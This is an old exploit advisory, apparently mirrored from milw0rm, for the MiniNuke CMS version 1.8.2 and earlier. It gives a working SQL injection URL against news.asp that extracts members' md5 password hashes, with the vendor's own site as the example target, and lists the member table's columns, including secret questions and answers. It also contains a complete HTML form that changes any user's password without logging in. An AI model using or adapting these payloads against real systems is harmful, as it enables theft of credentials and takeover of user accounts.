MiniNuke <= 1.8.2 - Multiple SQL Injection Vulnerabilities

🗓️ 01 Jul 2014 00:00:00Reported by RootType

MiniNuke <= 1.8.2 - SQL Injection & Remote User Password Chang


                                                Contacts:{
ICQ: 10072
MSN/Email: [email protected]
Web: http://www.nukedx.com
}


---
Vendor: MiniNuke (www.miniex.net)
Version: 1.8.2 and prior versions must be affected.
About:Via this method remote attacker can inject SQL query to the news.asp 
---
How&Example: GET -&#62; http://[site]/news.asp?Action=Print&hid=[SQLQuery]
http://www.miniex.net/news.asp?Action=Print&hid=66%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_id=52

Columns of MEMBERS:
uye_id = userid
sifre = md5 password hash
g_soru = secret question.
g_cevap = secret answer
email = mail address
isim = name
icq = ICQ Uin
msn = MSN Sn.
aim = AIM Sn.
meslek = job
cinsiyet = gender
yas = age
url = url
imza = signature
mail_goster = show mail :P
avurl = avatar url
avatar = avatar


---
Vendor: MiniNuke (www.miniex.net)
Version: 1.8.2 and prior versions must be affected.
About:Via this method remote attacker can change any users password without login.
---
How&Example: 
HTML Example
[code]
&#60;html&#62;
&#60;title&#62;MiniNuke &#60;= 1.8.2 remote user password change&#60;/title&#62;
&#60;form method=&#34;POST&#34; action=&#34;http://[SITE]/membership.asp?action=lostpassnew&#34;&#62;
&#60;table border=&#34;0&#34; cellspacing=&#34;1&#34; cellpadding=&#34;0&#34; align=&#34;center&#34; width=&#34;75%&#34;&#62;
&#60;tr&#62;&#60;td colspan=&#34;2&#34; align=&#34;center&#34;&#62;&#60;font face=verdana size=2&#62;Now fill in the blanks&#60;/font&#62;&#60;/td&#62;&#60;/tr&#62;
&#60;tr&#62;&#60;td colspan=&#34;2&#34; align=&#34;center&#34;&#62;&#60;font face=tahoma size=1red&#62;Change password &#60;/font&#62;&#60;/td&#62;&#60;/tr&#62;
&#60;tr&#62;&#60;td width=&#34;50%&#34; align=&#34;right&#34;&#62;&#60;font face=verdana size=1&#62;PASSWORD: &#60;/font&#62;&#60;/td&#62;
&#60;td width=&#34;50%&#34;&#62;&#60;input type=&#34;text&#34; name=&#34;pass&#34; size=&#34;20&#34;&#62;&#60;/td&#62;&#60;/tr&#62;
&#60;tr&#62;&#60;td width=&#34;50%&#34; align=&#34;right&#34;&#62;&#60;font face=verdana size=1&#62;PASSWORD Again : &#60;/font&#62;&#60;/td&#62;
&#60;td width=&#34;50%&#34;&#62;&#60;input type=&#34;text&#34; name=&#34;passa&#34; size=&#34;20&#34;&#62;&#60;input type=&#34;text&#34; name=&#34;x&#34; value=&#34;Membername&#34;&#62;&nbsp;&nbsp;
&#60;input type=&#34;submit&#34; value=&#34;Send&#34; name=&#34;B1&#34; style=&#34;font-family: Verdana; font-size: 10px; border: 1px ridge #FFFFFF; background-color: #FFFFFF&#34;&#62;&#60;/td&#62;&#60;/tr&#62;
&#60;/table&#62;&#60;/form&#62;
&#60;/html&#62;
[/code]

# milw0rm.com [2006-01-14]

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1